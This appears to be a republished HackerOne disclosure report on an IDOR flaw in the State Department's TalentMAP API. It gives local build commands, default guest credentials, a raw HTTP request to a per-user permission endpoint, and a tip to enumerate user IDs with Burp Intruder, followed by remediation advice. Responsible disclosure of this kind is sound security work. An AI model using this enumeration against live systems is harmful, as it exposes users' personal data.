U.S. Department of State: IDOR in TalentMAP API can be abused to enumerate personal information of all the users

Main / U.S. Department of State: IDOR in TalentMAP API can be abused to enumerate personal information of all the users

Discription

## Summary:

I hope you’re having a good day. Before starting to describe this vulnerability, I would like to thank the HackerOne triage team for doing the difficult job of triaging all these issues.

I observed an IDOR vulnerability in one of the endpoints in the Talentmap API. This vulnerability is similar to #1809328. In this report I will demonstrate ways to enumerate all user accounts in the Talentmap API logged in as a guest user. To triage this vulnerability, you need to manually build it in your system, the build instructions can be accessed in the report #1809328 where HackerOne team has successfully built the Talentmap API. However, if you’re having issues building it, drop a message!

After building the API, please go inside the docker container and run the following commands to create_seeded_users.

1. `$ python manage.py create_demo_environment`
2. `$ python manage.py create_seeded_users`

Also, go into the docker container and create some test users:
1. `$ python manage.py create_user normalUser [email protected] normalUser123 Normal User`
2. `$ python manage.py create_user normalUser1 [email protected] normalUser123 Normal User`
3. `$ python manage.py create_user normalUser2 [email protected] normalUser123 Normal User`

** Some details: **
i. The vulnerable endpoint = https://localhost:8000/api/v1/permission/user/{USER_ID}/

## Steps To Reproduce:
[add details for how we can reproduce the issue]

1. After running the API, browse `https://localhost:8000` and login using the credentials `username: guest , password: guestpassword ` , and copy the token obtained in the respones

{F2139636}

{F2139638}

2. Send the following request to https://localhost:8000. Replace {USER_ID} to the user id of the user you want to enumerate information of. Replace {token} to the token you obtained in step 1

“`
GET /api/v1/permission/user/{USER_ID}/ HTTP/1.1

Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8000/
JWT: {token}
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
“`

3. Observe user information returned in the response

Additionally, you could also use Burp intruder to cycle through user-ids from 1 to 100 to get information of all users in the database.

{F2139641}

##Remediation Guidance

Implement access control mechanism. Allow the user to only fetch their information.

## Supporting Material/References:
[list any additional material (e.g. screenshots, logs, etc.)]

* [attachment / reference]

## Impact

A malicious actor could fetch information of all users and cause a data breachRead More

References

Back to Main

Subscribe for the latest news: